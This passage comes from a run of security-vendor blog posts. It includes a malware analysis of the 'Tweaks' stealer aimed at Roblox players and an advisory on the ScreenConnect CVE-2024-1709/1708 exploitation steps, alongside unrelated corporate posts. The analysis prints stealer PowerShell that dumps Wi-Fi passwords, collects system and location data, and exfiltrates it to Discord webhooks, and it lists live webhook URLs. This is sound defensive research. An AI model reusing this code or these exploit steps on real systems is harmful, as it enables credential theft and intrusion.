Roblox account data vulnerable, but it may also compromise the data and device.In this blog, we analyze the Tweaks attack campaign and its technical characteristics.Key TakeawaysThe Tweaks or Tweaker stealer masquerades as a tool to enhance frames per second (FPS) for Roblox users that steals data in the background without the user’s knowledge.The attackers leverage YouTube by enticing users to watch videos on "How to increase FPS" that contain links to their Discord groups. Once users join these groups, the attackers provide them with links to malicious files disguised as game tweaks and modifications.The stealer is Powershell-based and exfiltrates sensitive data like user information, location, Wi-Fi profiles, and passwords, Roblox IDs, and in-game currency details.Once sensitive data is obtained, it is sent via a Discord webhook to the attacker-controlled server. ThreatLabz researchers discovered multiple attackers copying a “free” version of Tweaks and using it to sell “paid” versions. BackgroundWhy is FPS appealing to Roblox users?The Roblox game boasts a massive user base consisting of millions of players worldwide. Roblox offers a diverse range of games and experiences, allowing players to explore virtual worlds and engage in various activities. One feature that attracts Roblox players is the desire for an enhanced gaming experience, including improved FPS. Higher FPS can result in smoother gameplay, making it an appealing prospect for players seeking optimal performance. It’s not unusual for gamers to download optimization tools from popular platforms like YouTube and Discord to increase their hardware performance – making it more likely that a gamer might unintentionally download the Tweaks malware.Gaming sees more cyber attacksRoblox's significant user base of 71.5 million daily active users makes it an attractive target for cyber attackers. In addition, a 2024 report shows that the gaming industry is now worth around $455.27 billion. In light of these trends, it is not surprising that hackers looking to exploit and monetize sensitive data are targeting Roblox users, who, like many other gamers, store a wealth of data in their gaming accountsCampaign AnalysisDuring our investigation, we discovered several YouTube channels and videos offering tutorials on how to improve FPS in Roblox. In these videos, Roblox players were instructed to disable their antivirus software to ensure the smooth operation of a “PC optimizer” without encountering any issues. In reality, this tactic is used to make a user’s system easier to infect with malware.In the description boxes of these videos, links to the attacker’s corresponding Discord groups are provided. Figure 1 below shows a Tweaks YouTube channel, the Discord group links provided to the user, and the initial Tweaks interface that appears when users download the initial file.Figure 1: An example of a Tweaks YouTube channel, links to Discord groups, and the Tweaks interface.Once they enter the attacker-controlled Discord channels, users encounter both free and paid versions of FPS optimization files. Our initial analysis revealed that both versions were identical, utilizing the same BAT file. Consequently, the choice between the free and paid versions had no impact on the outcome. The only distinction was that users who opted for the paid version experienced a small financial loss and had their data stolen.Presently, attackers entice new users by offering a free version with limited optimization features, alongside a paid version that promises more advanced optimization capabilities.Once users download the files, they unknowingly install the Tweaks malware, which not only infects their system but also puts their data at risk of being stolen. From the user's perspective, everything seems normal as the Tweaks malware genuinely enhances FPS optimization. This deceptive behavior makes users less suspicious of the malware since it appears to be fulfilling its intended purpose. Figure 2 below shows both the paid and free version of Tweaks on the Discord channel.Figure 2: An example of the Discord group advertising FPS optimization files to distribute Tweaks malware.Case Study 1After joining the Discord group, Roblox gamers are directed to download a malicious BAT file from a Mediafire link, leading to a malware infection.Once the malware is executed, the BAT file presents users with the Tweaks menu interface, while simultaneously stealing their information in the background. The stolen data is then sent via Discord webhooks to an attacker-controlled server.The figure below illustrates the Tweaks attack chain.Figure 3: Illustrates the Tweaks attack chain involving a Discord group supplying a BAT file.Case Study 2Upon further investigation, we discovered that Tweaks was being sold on Discord. Two versions are available for purchase: the Beta Menu and the Paid Menu.The malware author converted the BAT file into an EXE file and then inserted the EXE file into a password-protected ZIP archive. This new iteration employs the same stealing capabilities as the BAT file discussed in Case Study 1. The figure below illustrates the Tweaks attack chain for Case Study 2. Figure 4: This diagram illustrates the Tweaks attack chain involving a Discord group supplying an EXE file inside of a ZIP archive.CapabilitiesThe Tweaks malware can steal the following data:User’s Wi-Fi profiles and passwordsUUID and usernamesUser locationIP address and timeSystem informationRoblox ID and in-game currency informationTechnical AnalysisThe following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.Case Study 11. BAT files establish webhooks: To start, once the user downloads the BAT file and executes it, the malware establishes the necessary webhook URLs using the Powershell commands below:"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^ "Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"The file embeds the pilfered data within the webhooks, ensuring its transmission to the attackers.2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the Powershell command below: “$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”The code sample above is also shown in Figure 5 below.Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect UUIDs and usernames along with the user's location including the following fields: country, region, city, and approximate location. The Powershell code looks like this:"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^ "$pcUsername = $env:USERNAME;" "$ipInfo = Invoke-RestMethod -Uri '';" ^ "$country = $;" ^ "$region = $ipInfo.region;" ^ "$city = $;" ^ "$location = $ipInfo.loc;"The code sample above, along with the user’s location and username, are shown in Figure 6 below.Figure 6: Tweaks code showing the theft of UUID, user name, and the user’s location.4. Additional data theft: In addition, the malware collects IP information like private and public IP addresses, the current time, system information, Roblox ID, and currency information.The former values are collected using the following Powershell code:"$publicIp = (Invoke-RestMethod -Uri '').ip;" ^ "$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^ "$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^ "$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"The latter values are collected with the code shown in Figure 7 below.Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.Case Study 2In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file. Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1.The malware creates a folder in the Temp directory, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp, with a random name and creates a BAT file in that directory as shown in the screenshot below.Figure 8: The process tree of the Tweaks EXE file.The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.ConclusionAttackers are leveraging popular community platforms, like YouTube and Discord, to distribute Tweaks malware and steal sensitive data. They capitalize on the legitimate reputation of YouTube and Discord communities to trick victims into inadvertently downloading (and in some cases paying) for their own malware infections. To mitigate these risks, Roblox users (and all gamers) should prioritize using legitimate apps from reputable and secure sources, thereby avoiding unknown or unverified application origins. By adhering to these precautions, gamers can enhance their cybersecurity defenses and protect themselves from potential malware threats.Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Because of the sandbox analysis, threat scores and specific MITRE ATT&CK techniques triggered were identified. Figure 9: Sandbox reportWin32.PWS.TWEAKS BAT.PWS.TWEAKSMITRE ATT&CK TechniquesIDTechnique NameT1566PhishingT1082System Information DiscoveryT1064ScriptingT1010Application Windows DiscoveryT1047Windows Management InstrumentationT1016.002Wi-Fi DiscoveryT1016System Network Configuration DiscoveryT1059Command and Scripting InterpreterT1018Remote System DiscoveryT1562Disable or Modify ToolsIndicators Of Compromise (IOCs)MD5File Typee35864892846be3462139f9534d5ddb5EXE0e8d32259b06ab01cd04587b1ae5d0c1BAT Webhook URLhttps://discord[.]com/api/webhooks/1193562861071511683/Y3e960iiIYKeT-2hq8c0VDuprdKTD3u5F1f0AKfPQnQde8CoXnK2HzVoVGb6mBgXTsc6https://discordapp[.]com/api/webhooks/1197341553404956752/xoPYo_fCPQGLsUIBrreFz05R9JuX_K4L96ResReZ7oLtj1za6QSYlCuMnTB8raMpVqCw YouTube Channels[.]com/@cartistweaks/videos[.]com/@fraidtweaks Tue, 12 Mar 2024 14:52:56 -0700 Preet Kamal To Help Build a More Inclusive Future, Develop Yourself An organization's success comes down to its people, and fostering diversity in the workforce amplifies a business's ability to navigate complex challenges. Women bring unique skills and perspectives that contribute significantly to a company's effectiveness. From innovation and effective communication to adept problem-solving and inspiring leadership, women enrich the professional landscape with a diverse array of talents. I am proud to be the global president of WIZE (Women in Zscaler Engage), Zscaler’s women-led employee resource group. This week we kicked off our month-long celebration for Women’s History Month and International Women’s Day. We are continuing to engage in tough conversations both regionally and globally with our allies to elevate women’s voices. There is still a great amount of work that must be done both today and for future generations of women and girls. As Kavitha Mariappan, EVP, Customer Experience & Transformation and WIZE executive sponsor said in her opening remarks at our IWD celebration, “You all are role models to so many in our industry. This is important. Studies show Gen Z girls are 20 percent more likely than boys to say they won’t pursue a STEM career because they don’t feel they would be good at it.” As a woman in tech and mother of five, stats like this push me to expose girls to the importance of STEM and encourage our allies to use their voices. We need everyone involved in this effort! Dr. Gena Cox joined us for our virtual celebrations to share her valuable insights on spearheading inclusion within the organization and the significance of respect, with an emphasis on those who are underrepresented. Dr. Cox shared her model on how everyone should feel valued, seen and heard. As I reflected on Dr. Cox’s keynote, I thought about ways I can, and should, be modeling respect in my professional and personal life. What could I do or say to impact someone’s day, life, or career? We all have a voice and platform, we just need to be shown how and when to use it. I am standing up for women’s rights, for equality in the tech industry, and as a mother I will always stand behind my children and seek to positively impact their future. I believe that, in 2024, we are another step closer to creating a more inclusive environment for future generations, and each individual act matters. This doesn’t just mean in our professional careers, it means taking it into our personal lives. I am invested in myself. I am dedicated to my personal growth and self-improvement to create the best version of myself. I am invested in my children and my family. As a working mother, I am continuously learning to skillfully balance the demands of my professional career while being active in my childrens’ lives. I am committed to showing each of them that they are valued, heard, seen, and loved. I am invested in my community. I am passionate about community engagement in my personal and professional lives. I will continue to empower others and reinforce among allies the importance of collaboration through education while leading by example. Zscaler’s WIZE International Women’s Day celebration also recognized 28 women from around the world with a WIZE Award for their commitment and dedication to making an inclusive workplace through mentorship, community engagement, leadership, going the extra mile, and serving our customers. Thank you to all of our winners and our greater WIZE community for your continued support and efforts to create a safe environment where we can bring our authentic self to work. We hope you join us in celebrating Women’s History Month and International Women’s Day 2024! To learn more about the amazing women of Zscaler, watch this video and explore the content below: What to Read Next: This International Women’s Day, let’s pull up a chair for all of our women colleagues The ascendency of inclusion: A conversation with Dr. Gena Cox Celebrating Women at Zscaler: WIZE Woman of Impact in APJ: Sandra Wang WIZE Women of Impact: Wendy Bartijn Sun, 10 Mar 2024 17:24:56 -0700 Julia Cummings Outpace Attackers with AI-Powered Advanced Threat Protection Securing access to the internet and applications for any user, device, or workload connecting from anywhere in the world means preventing attacks before they start. Zscaler Advanced Threat Protection (ATP) is a suite of AI-powered cyberthreat and data protection services included with all editions of Zscaler Internet Access (ZIA) that provides always-on defense against complex cyberattacks, including malware, phishing campaigns, and more. Leveraging real-time AI risk assessments informed by threat intelligence that Zscaler harvests from more than 500 trillion daily signals, ATP stops advanced phishing, command-and-control (C2) attacks, and other tactics before they can impact your organization. In aggregate, Zscaler operates the largest global security cloud across 150 data centers and blocks more than 9 billion threats per day. Additionally, our platform consumes more than 40 industry threat intelligence feeds for further analysis and threat prevention. With ATP you can: Allow, block, isolate, or alert on web pages based on AI-determined risk scores Block malicious content, files, botnet, and C2 traffic Stop phishing, spyware, cryptomining, adware, and webspam Prevent data loss via IRC or SSH tunneling and C2 traffic Block cross-site scripting (XSS) and P2P communications to prevent malicious code injection and file downloads To provide this protection, Zscaler inspects traffic—encrypted or unencrypted—to block attackers’ attempts to compromise your organization. Zscaler ThreatLabz found in 2023 that 86% of threats are now delivered over encrypted channels, underscoring the need to thoroughly inspect all traffic. Enabling protection against these threats takes just a few minutes in ATP in the Zscaler Internet Access management console. This blog will help you better understand the attack tactics ATP prevents on a continuous basis. We recommend you select “Block” for all policy options and set the "Suspicious Content Protection" risk tolerance setting to "Low" in the ATP configuration panel of the ZIA management console. Prevent web content from compromising your environmentThreat actors routinely embed malicious scripts and applications on legitimate websites they’ve hacked. ATP policy protects your traffic from fraud, unauthorized communication, and other malicious objects and scripts. To bolster your organization's web security, the Zscaler ATP service identifies these objects and prevents them from downloading unwanted files or scripts onto an endpoint device via the user’s browser. Using multidimensional machine learning models, the ZIA service applies inline AI analysis to examine both a web page URL and its domain to create Page Risk and Domain Risk scores. Given the magnitude of Zscaler’s dataset and threat intelligence inputs, risk scoring is not dependent on specific indicators of compromise (IOCs) or patterns. Using AI/ML to analyze web pages reveals malicious content including injected scripts, vulnerable ActiveX, and zero-pixel iFrames. The Domain Risk score results from analysis of the contextual data of a domain, including hosting country, domain age, and links to high-risk top-level domains. The Page Risk and Domain Risk scores are then combined to produce a single Page Risk score in real time, which is displayed on a sliding scale. This risk score is then evaluated against the Page Risk value you set in the ATP configuration setting (as shown below). Zscaler will block users from accessing all web pages with a Page Risk score higher than the value you set. You can set the Page Risk value based on your organization’s risk tolerance. Disrupt automated botnet communicationA botnet is a group of internet-connected devices, each of which runs one or more bots, or small programs, that are collectively used for service disruption, financial or sensitive information theft via distributed denial-of-service (DDoS) attacks, spam campaigns, or brute-forcing systems. The threat actor controls the botnet using command-and-control software. Command & Control Servers An attacker uses a C2 server to send instructions to systems compromised by malware and retrieve stolen data from victim devices. Enabling this ATP policy blocks communication to known C2 servers, which is key to preventing attackers from communicating with malicious software deployed on victims’ devices. Command & Control Traffic This refers to botnet traffic that sends or receives commands to and from unknown servers. The Zscaler service examines the content of requests and responses to unknown servers. Enabling this control in the ATP configuration blocks this traffic. Block malicious downloads and browser exploits Malicious Content & Sites Websites that attempt to download dangerous content to the user's browser upon loading a page introduce considerable risk: this content can be downloaded silently, without the user's knowledge or awareness. Malicious content could include exploit kits, compromised websites, and malicious advertising. Vulnerable ActiveX Controls An ActiveX control is a software program for Internet Explorer, often referred to as an add-on, that performs specific functionality after a web page loads. Threat actors can use ActiveX controls to masquerade as legitimate software when, in reality, they use them to infiltrate an organization’s environment. Browser Exploits Known web browser vulnerabilities can be exploited, including exploits targeting Internet Explorer and Adobe Flash. Despite Adobe sunsetting the browser-based add-on in January 2021, Flash components are still found embedded in systems, some of which may be critical for infrastructure or data center operations. Foil digital fraud and cryptomining attempts AI-Powered Phishing Detection Phishing is becoming harder to stop with new tactics, including phishing kits sold on the black market—these kits enable attackers to spin up phishing campaigns and malicious web pages that can be updated in a matter of hours. Phishing pages trick users into submitting their credentials, which attackers use in turn to compromise victims’ accounts. Phishing attacks remain problematic because even unsophisticated criminals can simply buy kits on the dark web. Threat actors can also update phishing pages more quickly than most security solutions meant to detect and prevent phishing can keep up with. But with Zscaler ATP, you can prevent compromises from patient zero phishing pages inline with advanced AI-based detection. Known Phishing Sites Phishing websites mimic legitimate banking and financial sites to fool users into thinking they can safely submit account numbers, passwords, and other personal information, which criminals can then use to steal their money. Enable this policy to prevent users from visiting known phishing sites. Suspected Phishing Sites Zscaler can inspect a website’s content for indications that it is a phishing site, and then use AI to stop phishing attack vectors. As part of a highly commoditized attack method, phishing pages can have a lifespan of a few hours, yet most phishing URL feeds lag 24 hours behind—that gap can only be addressed by a capability able to stop both new and unknown phishing attacks. Spyware Callback Adware and spyware sites gather users’ information without their knowledge and sell it to advertisers or criminals. When “Spyware Callback” blocking is enabled, Zscaler ATP prevents spyware from calling home and transmitting sensitive user data such as address, date of birth, and credit card information. Cryptomining Most organizations block cryptomining traffic to prevent cryptojacking, where malicious scripts or programs secretly use a device to mine cryptocurrency—but this malware also consumes resources and impacts performance of infected machines. Enabling “Block” in ATP’s configuration settings prevents cryptomining entering your environment via user devices. Known Adware & Spyware Sites Threat actors stage legitimate-looking websites designed to distribute potentially unwanted applications (PUA). These web requests can be denied based on the reputation of the destination IP or domain name. Choose “Block” in ATP policy configuration to prevent your users from accessing known adware and spyware sites. Shut down unauthorized communication Unauthorized communication refers to the tactics and tools attackers use to bypass firewalls and proxies, such as IRC tunneling applications and "anonymizer" websites. IRC Tunneling Internet Relay Chat (IRC) protocol was created in 1988 to allow real-time text messaging between internet-connected computers. Primarily used in chat rooms (or “channels”), the IRC protocol also supports data transfer as well as server- and client-side commands. While most firewalls block the IRC protocol, they may allow SSH connections. Hackers take advantage of this to tunnel their IRC connections via SSH, bypass firewalls, and exfiltrate data. Enabling this policy option will block IRC traffic from being tunneled over HTTP/S. SSH Tunneling SSH tunneling enables sending data with an existing SSH connection, with the traffic tunneled over HTTP/S. While there are legitimate uses for SSH tunnels, bad actors can use them as an evasion technique to exfiltrate data. Zscaler ATP can block this activity. Anonymizers Attackers use anonymizer applications to obscure the destination and content they want to access. Anonymizers enable the user to bypass policies that control access to websites and internet resources. Enabling this policy option blocks access to anonymizer sites. Block cross-site scripting (XSS) and other malicious web requestsCross-site scripting (XSS) is an attack tactic wherein bad actors inject malicious scripts into otherwise trusted websites. XSS attacks occur when a threat actor uses a web app to send malicious code, usually in the form of a client-side script, to a different end user. Cookie Stealing Cookie stealing, or session hijacking, occurs when bad actors harvest session cookies from users’ web browsers so they can gain access to sensitive data including valuable personal and financial details they in turn sell on the dark web or use for identity theft. Attackers also use cookies to impersonate a user and log in to their social media accounts. Potentially Malicious Requests Variants of XSS requests enable attackers to exploit vulnerabilities in a web application so they can inject malicious code into a website. When other users load a page from the target web server in their browser, the malicious code executes, expanding the attack exponentially. Prevent compromise via peer-to-peer file sharing P2P programs enable users to easily share files with each other over the internet. While there are legitimate uses of P2P file sharing, these tools are also frequently used to illegally acquire copyrighted or protected content—and the same content files can contain malware embedded within legitimate data or programs. BitTorrent The Zscaler service can block the usage of BitTorrent, a communication protocol for decentralized file transfers supported by various client applications. While its usage was once pervasive, global torrent traffic has decreased from a high of 35% in the mid-2000s to just 3% of all global internet traffic in 2022. Tor Tor is a P2P anonymizer protocol that obscures the destination and content accessed by a user, enabling them to bypass policies controlling what websites or internet resources they can access. With Zscaler ATP, you can block the usage of the Tor protocol. Avoid VOIP bandwidth overutilizationWhile convenient for online meetings, video conferencing tools can be bandwidth-intensive. They may also be used to transfer files or other sensitive data. Depending on both your organization's risk tolerance level and overall network performance, you may want to curtail employee or contractor use of Google Hangouts. Google Hangouts While VOIP application usage may be encouraged for cost savings over traditional landline-based communications, it’s often associated with high bandwidth usage. Google Hangouts (a.k.a. Google Meet) requires a single video call participant to meet a 3.2 Mbps outbound bandwidth threshold. Inbound bandwidth required starts at 2.6Mbps for two users and expands with additional participants. In Zscaler ATP, you can block Google Hangout usage to conserve bandwidth for other business-critical applications. Comprehensive, always-on, real-time protection Clearly, there’s a wide swath of protection modern organizations need to fortify their security posture on an ongoing basis. Zscaler Advanced Threat Protection delivers always-on protection against ransomware, zero-day threats, and unknown malware as part of the most comprehensive suite of security capabilities, powered by the world's largest security cloud—all at no extra cost to ZIA customers. ATP filters and blocks threats directed at ZIA customers and, in combination with Zscaler Firewall and Zscaler Sandbox, provides superior threat prevention thanks to: A fully integrated suite of AI-powered security services that closes security gaps and reduces risks left by other vendors’ security tools. Zscaler Sandbox detects zero-day malware for future-proof protection while Zscaler Firewall provides IPS and DNS control and filtering of the latest non-web threats. Real-time threat visibility to stay several steps ahead of threat actors. You can’t wait for another vendor’s tool to finish scheduled scans to determine if you’re secure—that puts your organization at risk. Effective advanced threat protection from Zscaler monitors all your traffic at all times. Centralized context and correlation that provides the full picture for faster threat detection and prevention. Real-time, predictive cybersecurity measures powered by advanced AI continuously give your IT or security team the ability to outpace attackers. The ability to inspect 100% of traffic with Zscaler’s security cloud distributed across 150 points of presence worldwide. Operating as a cloud-native proxy, the Zscaler Zero Trust Exchange ensures that every packet from every user, on or off-network, is fully inspected with unlimited capacity—including all TLS/SSL encrypted traffic. Learn more about how Zscaler prevents encrypted attacks and best practices to stop encrypted threats by securing TLS/SSL traffic: download a copy of the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report. Mon, 11 Mar 2024 07:00:01 -0700 Brendon Macaraeg Multiple Vulnerabilities Found In ConnectWise ScreenConnect IntroductionOn February 19, 2024, ConnectWise released an advisory disclosing critical vulnerabilities impacting ScreenConnect Remote Monitoring and Management (RMM) software. The first vulnerability, tracked as CVE-2024-1709, allows threat actors to bypass authentication and exploit a second vulnerability, CVE-2024-1708. The second vulnerability is a path traversal flaw that enables attackers to upload a malicious file, potentially leading to Remote Code Execution (RCE) on affected versions of ScreenConnect instances. The technical details of this vulnerability underscore its easy exploitability, utilizing common tactics, techniques, and procedures (TTPs) that could lead to data exfiltration and lateral movement across compromised instances. RecommendationsZscaler ThreatLabz strongly recommends on-premises users of ConnectWise ScreenConnect software to promptly upgrade to the latest version, which has crucial fixes to mitigate the vulnerabilities identified as CVE-2024-1709 and CVE-2024-1708. Affected VersionsThe following versions of ConnectWise ScreenConnect are affected by the vulnerabilities disclosed and should be updated immediately: ScreenConnect 23.9.7 and prior BackgroundConnectWise ScreenConnect enables users to manage, connect, and access systems remotely. The remote access solution is available for on-prem and cloud architectures. ConnectWise’s advisory prompted the Cybersecurity & Infrastructure Security Agency (CISA) to add CVE-2024-1709 to their Known Exploited Vulnerabilities Catalog. CVE-2024-1709 earned a critical CVSS score of 10.0, while CVE-2024-1708 received a score of 8.4. CVE-2024-1709 allows a remote attacker to gain access to systems with admin privileges. Once inside the compromised system, the attacker leverages CVE-2024-1708 to upload malicious files to the compromised system and potentially achieve RCE. An attacker can exploit these vulnerabilities to: Access, upload, or modify important files Steal sensitive information and disrupt critical services Move laterally on the breached network How It WorksThe attack sequence begins by sending a malformed HTTP request to the vulnerable ScreenConnect instance. Specifically, this means appending any character to the /SetupWizard.aspx URL (i.e., /SetupWizard.aspx<something>) to gain unauthenticated access to the /SetupWizard.aspx page. The /SetupWizard.aspx page allows the attacker to create a new user account with administrator privileges, even on a pre-configured instance, without requiring any authentication. This exploit is possible due to a flaw in the SetupWizard.aspx file, responsible for the initial administrator setup and license validation on the instance. Once inside the system, the attacker uploads a malicious ASHX ScreenConnect extension, packaged in a ZIP archive, to achieve RCE and later obtain a remote web shell. The attack sequence is shown in Figure 1. Figure 1: A diagram illustrating how an attacker targets a vulnerable ScreenConnect instance. Exploitation Steps1. Malformed HTTP Request: The attacker launches the attack by sending a malformed HTTP request to the vulnerable ScreenConnect instance as shown below. Figure 2: An example of a malformed HTTP request targeting CVE-2024-1709. The figure below shows CVE-2024-1709 exploitation via a 302 redirect to the /SetupWizard.aspx page. Figure 3: Exploitation of CVE-2024-1709. 2. Arbitrary Admin Account Creation: Upon receiving the malicious request, the ScreenConnect instance processes the request and redirects to the /SetupWizard.aspx page, where the attacker can create an administrator account as shown in Figure 4. Figure 4: The ScreenConnect page where the attacker can fraudulently create an administrator user account. The figure below includes XML showing that the attacker was able to successfully create an administrator user account. Figure 5: ScreenConnect\App_Data\User.xml shows evidence of the attacker-created administrator user account. 3. Malicious Payload Delivery: The attacker uploads a malicious ScreenConnect extension (shown in Figure 6) wrapped in a ZIP archive to the vulnerable instance. This ZIP archive contains an ASHX file designed to exploit CVE-2024-1708 and facilitate RCE on the vulnerable system. Figure 6: A POST transaction depicting the installation of a malicious extension on a ScreenConnect Instance. 4. Malicious Code Execution: Following the successful upload of the malicious ScreenConnect extension (.ashx file), the vulnerable system executes the code contained within the payload as shown in Figure 7. This execution grants the attacker unauthorized access and control over the compromised system, enabling further exploitation and privilege escalation. Figure 7: The malicious ZIP archive uploaded by the attacker containing a Base64-encoded command invoking cmd.exe for remote code execution. According to reports, the post-exploitation phase included the deployment of ToddlerShark malware, leveraging the second vulnerability. ToddlerShark malware demonstrates polymorphic behavior and utilizes legitimate Microsoft binaries and alternate data streams. It bears a striking resemblance to BabyShark malware, which has been associated with the North Korean APT group known as Kimsuky. Zscaler Best PracticesSafeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with advanced Deception turned on. Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers. Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control (C2) domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware. Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware. Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as art of a second-stage payload. Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations. ConclusionTo ensure security, ConnectWise ScreenConnect users should update their on-prem deployments to version 23.9.8 or above promptly. Cloud-based deployments, on the other hand, do not require any action as ConnectWise has already applied the necessary patches. Failing to update exposes systems to vulnerabilities such as CVE-2024-1709 and CVE-2024-1708. These vulnerabilities enable threat actors to manipulate server configurations, gain administrator-level privileges, and execute remote code. Indicators of CompromiseConnectWise reported active exploitation of CVE-2024-1709 and released the following Indicators of Compromise (IOCs): 155[.]133[.]5[.]15 155[.]133[.]5[.]14 118[.]69[.]65[.]60 Zscaler CoverageThe Zscaler ThreatLabz team has deployed the following: Zscaler Advanced Threat Protection APP.EXPLOIT.CVE-2024-1708_CVE-2024-1709 Zscaler Private Access AppProtection 6000760 - ConnectWise ScreenConnect SetupModule Authentication Bypass (CVE-2024-1709) For more details, visit the Zscaler Threat Library. Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress Blog Detection Guidance for ConnectWise CWE-288 ( Mon, 11 Mar 2024 14:30:19 -0700 Arkaprava Tripathi LinkedIn Outage Detected by Zscaler Digital Experience (ZDX) At 3:40 p.m. EST on March 6, 2024, Zscaler Digital Experience (ZDX) saw a substantial, unexpected drop in the ZDX score for LinkedIn services around the globe. Upon analysis, we noticed HTTP 503 errors highlighting a LinkedIn outage, with the ZDX heatmap clearly detailing the impact at a global scale. ZDX dashboard indicating widespread LinkedIn outage ZDX enables customers to proactively identify and quickly isolate service issues, giving IT teams confidence in the root cause, reducing mean time to resolve (MTTR) and first response time (MTTD). ZDX dashboard showing LinkedIn global issues ZDX Score highlights LinkedIn outageVisible on the ZDX admin portal dashboard, the ZDX Score represents all users in an organization across all applications, locations, and cities on a scale of 0 to 100, with the low end indicating a poor user experience. Depending on the time period and filters selected in the dashboard, the score will adjust accordingly. The dashboard shows that the ZDX Score for the LinkedIn probes dropped to ZERO during the outage window of approximately 1 hour. From within ZDX, service desk teams can easily see that the service degradation isn’t limited to a single location or user and quickly begin analyzing the root cause. ZDX Score indicating LinkedIn outage and recovery (times in EST) Also in the ZDX dashboard, “Web Probe Metrics” highlight the user impact of reaching LinkedIn applications across a timeline with response times. In this case, the server responded with 503 errors, indicating the server was not ready to handle requests. ZDX Web Probe Metrics indicating 503 errors (times in EST) ZDX can quickly identify the root cause of user experience issues with its new AI-powered root cause analysis capability. This spares IT teams the labor of sifting through fragmented data and troubleshooting, thereby accelerating resolution and keeping employees productive. With a simple click in the ZDX dashboard, you can analyze a score, and ZDX will provide insight into potential issues. As you can see, in the case of this LinkedIn outage, ZDX highlights that the application is impacted while the network itself is fine. ZDX AI-powered root cause analysis indicates the reason for the outage When there’s an application outage, many IT teams turn to the network as the root cause. However, as you can see above, ZDX AI-powered root cause analysis verified that the network transport wasn’t the issue; it was actually at the application level. You can verify this by looking at the CloudPath metrics from the user to the destination. ZDX CloudPath showing full end-to-end data path ZDX CloudPath detailed hops between the nodes With AI-powered analysis and dynamic alerts, IT teams can quickly compare optimal vs. degraded user experiences and set intelligent alerts based on deviations in observed metrics. ZDX allows you to compare two points in time to understand the differences between them. This function determines a good vs. poor user experience, visually highlighting the differences between application, network, and device metrics. The end user comparison during the LinkedIn outage vs. a known good score indicates the ZDX Score difference, highlighting the unexpected performance drop for the end user. ZDX comparison mode identifies the change in user experience According to the LinkedIn status page, the outage was reported at 12:50 PST until 14:05 PST, which correlates to the ZDX data above. However, LinkedIn services started to recover pretty quickly, by 13:40 PST, and LinkedIn reported the issue resolved by 14:05 PST. Source: LinkedIn With ZDX alerting, our customers were proactively notified about end user problems, and incidents were opened automatically with our service desk integration (e.g., ServiceNow) long before users started to report it. From a single dashboard, customers were able to quickly identify this as a LinkedIn issue, not an internal network outage, saving precious IT time. Zscaler Digital Experience successfully detected a LinkedIn outage along with its root cause, giving our customers the confidence that it was not a single location, their networks, or devices, averting critical impact to their business. Try Zscaler Digital Experience today ZDX helps IT teams monitor digital experiences from the end user perspective to optimize performance and rapidly fix offending application, network, and device issues. To see how ZDX can help your organization, please contact us. Thu, 07 Mar 2024 19:14:07 -0800 Rohit Goyal From VDI replacement to complementary use: Part 2 In the first part of this VDI blog series, we discussed the two major use cases of access granularity and traffic inspection and how Zscaler can support these with the help of the Zero Trust Exchange platform. In this blog, we will focus on more use cases and ways to integrate Zscaler as complementary solution to VDI to cover security related aspects. Data residency restriction This use case deserves a deeper investigation, because although we can say that it is supported, there could be specific instances in which Zscaler cannot replace the VDI environment. Zscaler Cloud Browser Isolation (CBI) prevents data to leave the corporate boundary. We can define what level of restriction applies to the data exchange between the actual application and the isolated container. The recent introduction of Endpoint DLP capabilities could further help our conversation when stricter security requirements are required. Zscaler Cloud Browser Isolation is inherently non-persistent; the virtual machine is terminated after each session. Now, imagine the scenario of a developer working remotely on a virtual desktop where he has his own environment and data can’t leave the company area. This individual would need a persistent desktop to work, and the user environment shouldn’t be destroyed when he closes the working session. This use case could be challenging for a VDI replacement. This use case could be addressed by leveraging the Private Remote Access (PRA) and RDP. In the above example, an RDP session could be launched toward a machine where the developer can work and log in, where their development environment sits and where communication is local, and data won't leave the company boundary. Obviously, the organisation’s environment must be assessed carefully to validate the pros and cons of the proposed alternative. Traffic localization In this scenario, the goal is to keep the communication local to the data centre due to performance issues. From a Zscaler point of view, the area of potential replacement exists once we validated the possibility to leverage Private Remote Access (PRA) and RDP with the customer, where a remote session is launched toward a machine that interacts locally with the server. Desktop or software license management / reduction The discussion about this scenario under the assumption to 